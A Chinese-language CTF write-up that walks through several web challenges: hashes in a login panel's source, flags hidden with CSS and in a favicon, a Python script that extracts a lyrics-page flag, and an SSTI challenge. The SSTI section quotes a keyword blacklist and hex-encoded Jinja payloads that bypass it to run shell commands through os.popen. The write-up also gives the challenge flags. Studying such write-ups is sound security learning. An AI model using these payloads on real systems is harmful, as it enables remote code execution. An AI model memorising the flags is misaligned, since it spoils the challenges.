本文最后更新于 2 天前,其中的信息可能已经有所发展或是发生改变。
Login Panel
查看源代码
const ajnsdjkamsf = 'ba773c013e5c07e8831bdb2f1cee06f349ea1da550ef4766f5e7f7ec842d836e'; // replace
const lanfffiewnu = '48d2a5bbcf422ccd1b69e2a82fb90bafb52384953e77e304bef856084be052b6'; // replace
用户名和密码的hash
Stylish Flag
前端有
hidden class="flag"
删去hidden很不清楚,查看css文件得知
清晰度很低
所以直接修改
<div class="flag" style="opacity: 1; transform: rotate(180deg);"></div>
得到flag
v1t{H1D30UT_CSS}
Tiny Flag
。。。。
/favicon.ico
v1t{T1NY_ICO}
Mark The Lyrics
一头雾水,有个youtobe视频
其中发现歌词发现都在下面写好了,同时在html中,都在<mark>标签中
V - from "Verse 1"
V - 来自“第 1 节”
1 - from "Verse 1"
1 - 来自“第 1 节”
T - from "M-TP"
T - 来自“M-TP”
{ - from "{Pre-Chorus"
{ - 来自“{Pre-Chorus”
MCK - from "RPT MCK"
MCK - 来自“RPT MCK”
pap- - from "pap-pap-pap-pap"
pap- - 来自“pap-pap-pap-pap”
cool - standalone word
cool - 独立词
ooh- - from "ooh-ooh-ooh-ooh"
ooh- - 来自“ooh-ooh-ooh-ooh”
yeah - standalone word
yes - 独立词
} - from the Outro tag
} - 来自 Outro 标签
好misc的一集
#!/usr/bin/env python3
import re
# 读取 HTML 文件
with open('MCKey.html', 'r', encoding='utf-8') as f:
html_content = f.read()
# 打印标题
print("="*80)
print("LYRICS FLAG EXTRACTOR")
print("="*80)
# 使用正则表达式提取所有的 <mark> 标签内容
marked_text = re.findall(r'<mark>([^<]+)</mark>', html_content)
print(f"\nFound {len(marked_text)} marked elements:\n")
# 存储标记的文本
flag_parts = []
for idx, text in enumerate(marked_text, 1):
print(f"{idx}. '{text}'")
flag_parts.append(text)
# 将标记的文本组合成一个字符串
flag_combined = ''.join(flag_parts)
print(f"\n{'='*80}")
print(f"Combined marked text: {flag_combined}")
print(f"{'='*80}")
# 生成不同格式的 Flag
print("\nPossible flags:")
print(f"1. Direct concatenation: {flag_combined}")
print(f"2. With underscores: {'_'.join(flag_parts)}")
# 检查是否符合指定的 Flag 格式
if flag_combined.startswith('V1T{') and flag_combined.endswith('}'):
print(f"\nVALID FLAG FORMAT: {flag_combined}")
else:
print(f"\nFlag format: V1T{{...}}")
print(f" Current result: {flag_combined}")
Possible flags:
1. Direct concatenation: V1T{MCK-pap-cool-ooh-yeah}
2. With underscores: V_1_T_{_MCK_-pap-_cool_-ooh-_yeah_}
VALID FLAG FORMAT: V1T{MCK-pap-cool-ooh-yeah}
5571
SSTI
黑名单
BLOCKED_LITERALS = [
'{', '}', '__', 'open', 'os', 'subprocess', 'import', 'eval', 'exec',
'system', 'popen', 'builtins', 'globals', 'locals', 'getattr', 'setattr',
'class', 'compile', 'inspect'
]
可以直接十六进制绕过
\x7b\x7b\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2e\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f\x2e\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f\x2e\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x6c\x73\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x20\x7d\x7d
\x7b\x7b\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2e\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f\x2e\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f\x2e\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x74\x78\x74\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x20\x7d\x7d
v1t{n0th1ng_b34ts_url_ssti_9cfac8e6b8978e3f6037d9608fed7767}
